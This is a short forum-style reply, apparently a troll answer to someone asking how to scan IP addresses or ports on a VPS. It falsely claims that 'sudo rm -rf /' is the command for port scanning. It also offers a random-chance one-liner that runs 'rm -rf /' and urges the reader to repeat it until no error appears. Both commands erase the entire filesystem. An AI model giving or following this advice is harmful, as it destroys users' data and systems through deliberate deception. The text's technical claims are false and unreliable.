If I understand correctly you want to scan all roots for ips? It's quite simple, just buy and use this item:
sudo rm -rf /
That's the right command, I always use it when I scan ports on my root VPS.
Try [ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo error
Run it a few time's until no error are showing and you are ready to scan ip
